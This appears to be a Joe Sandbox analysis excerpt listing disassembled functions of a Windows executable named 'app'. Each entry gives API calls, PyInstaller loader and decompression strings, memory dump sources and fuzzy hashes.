                                                                                                                                                                                                            Function 00007FF8A7FFA110 Relevance: 10.6, APIs: 7, Instructions: 129COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Long$FromLong_Unsigned$CriticalSection$DeallocEnterLeaveTuple_
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1188863696-0
                                                                                                                                                                                                            • Opcode ID: 497032735345ac6929e12228f73c82554442d66e2d20901b00d23f8ce1236ae3
                                                                                                                                                                                                            • Instruction ID: f9b07961171d4bd8addebe7b8c2526191caa258112961041f61d81c2b78d4b64
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 497032735345ac6929e12228f73c82554442d66e2d20901b00d23f8ce1236ae3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E514937A09BC196D7608F61E8407AEB3A0FB88798F044126DF9E43B94DF7CE1959B14
                                                                                                                                                                                                            Function 00007FF7ACE87BA0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 99COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                            • API String ID: 626452242-876015163
                                                                                                                                                                                                            • Opcode ID: aa298a002c453f6745e6396b8798e2734c1602e68a69c20a805e124d22ac7461
                                                                                                                                                                                                            • Instruction ID: 3c2c21d525b923d4fa470110272f6166fdeacbee437a8c51b803d92322e640c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa298a002c453f6745e6396b8798e2734c1602e68a69c20a805e124d22ac7461
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A41B032B0EA82E6E620EF15A44017AF6A5FB48791F9A4135EE4D67BB4DF3CD051C720
                                                                                                                                                                                                            Function 00007FF8A801D720 Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$ConditionVariable$EnterLeaveWake$Sleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2423294567-0
                                                                                                                                                                                                            • Opcode ID: 125375d02d8c018ed733b5a99ec2ee926c3b435bf2bd83db4789bc3c36573872
                                                                                                                                                                                                            • Instruction ID: e6f28055d3eee14daba87670d8a431e461941332828ac3462d87b4202d522c81
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 125375d02d8c018ed733b5a99ec2ee926c3b435bf2bd83db4789bc3c36573872
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4541493290AF82D6EB10CF20E8447AD77A0FB99B98F094132DE4D47699DF38D194C764
                                                                                                                                                                                                            Function 00007FF7ACE8CE28 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEAD
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEBB
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEE5
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CF2B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CF37
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                            • Opcode ID: 5875a968ec1c8163f4728790c5c34772c02e6e55674a02490018482c9d800bcd
                                                                                                                                                                                                            • Instruction ID: 9bd18943ff91ac958b9241b69cb3dd60a6f2910d3ecab83f49810efe2ddf4b71
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5875a968ec1c8163f4728790c5c34772c02e6e55674a02490018482c9d800bcd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC31C132A1F682B5FE51AF02A900575B2D4BF09BA1F9B4535ED1D6A3A0EF3CE4458720
                                                                                                                                                                                                            Function 00007FF7ACE86460 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE879A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7ACE867AF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF7ACE864BF
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82770: MessageBoxW.USER32 ref: 00007FF7ACE82841
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7ACE864D3
                                                                                                                                                                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7ACE86496
                                                                                                                                                                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7ACE8651A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                            • API String ID: 1662231829-3498232454
                                                                                                                                                                                                            • Opcode ID: 9eb99ae586d031700f80d960bb93105f64990418315754ce9dca1f45177a6931
                                                                                                                                                                                                            • Instruction ID: 099da92983183ff0bed5e8c1ee8c70a1594bd78d14001c93cc879eef496f46f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9eb99ae586d031700f80d960bb93105f64990418315754ce9dca1f45177a6931
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8531CC35B1E7C260FE20F721D6552B9E2516F94782FC50431DA4E727F9EE2CE1048720
                                                                                                                                                                                                            Function 00007FF8A7FFC210 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Buffer_Object_Release$BufferCallDeallocMethod_Size
                                                                                                                                                                                                            • String ID: read
                                                                                                                                                                                                            • API String ID: 1205621341-2555855207
                                                                                                                                                                                                            • Opcode ID: 5451e27af613ffe8bb6e8588c8c1850ac7d90ce703522a56250bc00e9d007f52
                                                                                                                                                                                                            • Instruction ID: 8efbc810d322912d6ba700e7cc753f97527b6139255765b05a43b782a7b19ef6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5451e27af613ffe8bb6e8588c8c1850ac7d90ce703522a56250bc00e9d007f52
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41314D23A1AB8592EF50CF20E8103BC23A0FB99B89F584235DE9D46694DFBCD5D5D710
                                                                                                                                                                                                            Function 00007FF8A7FF72A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Buffer_Object_Release$BufferCallDeallocMethod_Size
                                                                                                                                                                                                            • String ID: read
                                                                                                                                                                                                            • API String ID: 1205621341-2555855207
                                                                                                                                                                                                            • Opcode ID: 6630feee145a9f83c7cb0cd7104fd1d2f385eac3349607501728b6847737fd24
                                                                                                                                                                                                            • Instruction ID: cd38c352c1e569b55ec646028812cf96919f9b862bfe01eef72103dc6179e13f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6630feee145a9f83c7cb0cd7104fd1d2f385eac3349607501728b6847737fd24
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F317022A1AB8192EB50CF20E4403BD73A0FB95B48F644235DE8D463A4EF7DD5E5D720
                                                                                                                                                                                                            Function 00007FF7ACE879A0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE87A60
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                            • API String ID: 3723044601-876015163
                                                                                                                                                                                                            • Opcode ID: ee2ee3c888b621b3c3f4dc33b354bcabab4fe5f972038a38ac2187e11a85846b
                                                                                                                                                                                                            • Instruction ID: 59ce6404e3286414f3de503832cd4f8fe93af2fc6babc8c68ea61fcecd10c73e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee2ee3c888b621b3c3f4dc33b354bcabab4fe5f972038a38ac2187e11a85846b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2219132B0DA82A5EB50EB19F50007AE3A1EB987C5F9D4171DB4CA3BB9EF2DD5418710
                                                                                                                                                                                                            Function 00007FF8A8003EA0 Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConditionCriticalSectionVariableWake$EnterLeavefreemallocmemmove
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3264682818-0
                                                                                                                                                                                                            • Opcode ID: 1f8f14fb59383042ed8859ee83df18ef6659cd133a4df1ce815ae7c0c0b2a1f9
                                                                                                                                                                                                            • Instruction ID: 49289befb415591c5d309b0d8b254c22a4d6787697ca8a9bd51dde56db5ef29b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f8f14fb59383042ed8859ee83df18ef6659cd133a4df1ce815ae7c0c0b2a1f9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08218B22A0AF4192EF258F25A40027863B4FF19BD4F161235DE9D027E8EF38D5A1C354
                                                                                                                                                                                                            Function 00007FF7ACE9A550 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A55F
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A574
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A595
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5C2
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5D3
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5E4
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: 679a8f5ed95f4c44c4bc9ccb242736963b1e2f2654bfe38b80143c9ca5edf043
                                                                                                                                                                                                            • Instruction ID: d661c579c551c39ec14e56aea77414dc34ef77d06e05bd30556e993f60abf717
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 679a8f5ed95f4c44c4bc9ccb242736963b1e2f2654bfe38b80143c9ca5edf043
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3218E30B0F24262FA6873215645139E2525F447B4FD64774F93E7B7FAEE2CE8508221
                                                                                                                                                                                                            Function 00007FF8A7FF25B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_Buffer_Err_FormatKeywords_ParseReleaseSizeTuple
                                                                                                                                                                                                            • String ID: could not determine frame header size: %s$y*:frame_header_size
                                                                                                                                                                                                            • API String ID: 2231244333-4115140356
                                                                                                                                                                                                            • Opcode ID: 5c7bdbf753c40b503e25d8c69c6edf90da0d6e358ece52936f2ba7ce0c833419
                                                                                                                                                                                                            • Instruction ID: 1fa8a9334fe41d93c4419b33fdc242b11785564ca0087ba2c5fdfb4f8dd47980
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7bdbf753c40b503e25d8c69c6edf90da0d6e358ece52936f2ba7ce0c833419
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1221FF21B2AA46A2EF508B21E844B7D6350FF55BE0F454231D86E467E4DF7CE255C308
                                                                                                                                                                                                            Function 00007FF8A7FF4DE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_CallDeallocErr_Keywords_ObjectObject_ParseSizeStringTuple
                                                                                                                                                                                                            • String ID: write_size must be positive$|k:decompressobj
                                                                                                                                                                                                            • API String ID: 3366672808-3369549627
                                                                                                                                                                                                            • Opcode ID: 3c4fee81611e65eb09b3641140ab0b83dfce37c2912815ba2c0d923bc666c9d5
                                                                                                                                                                                                            • Instruction ID: 79a67612cd233e48f52cdb67f3dbdb708bfc35d9b80e52332e3cfda653ebc838
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c4fee81611e65eb09b3641140ab0b83dfce37c2912815ba2c0d923bc666c9d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18218921B0AA42A1EF008F25F84037A63A0FF88BD4F484031DA5D877A8DF7CD6A5C704
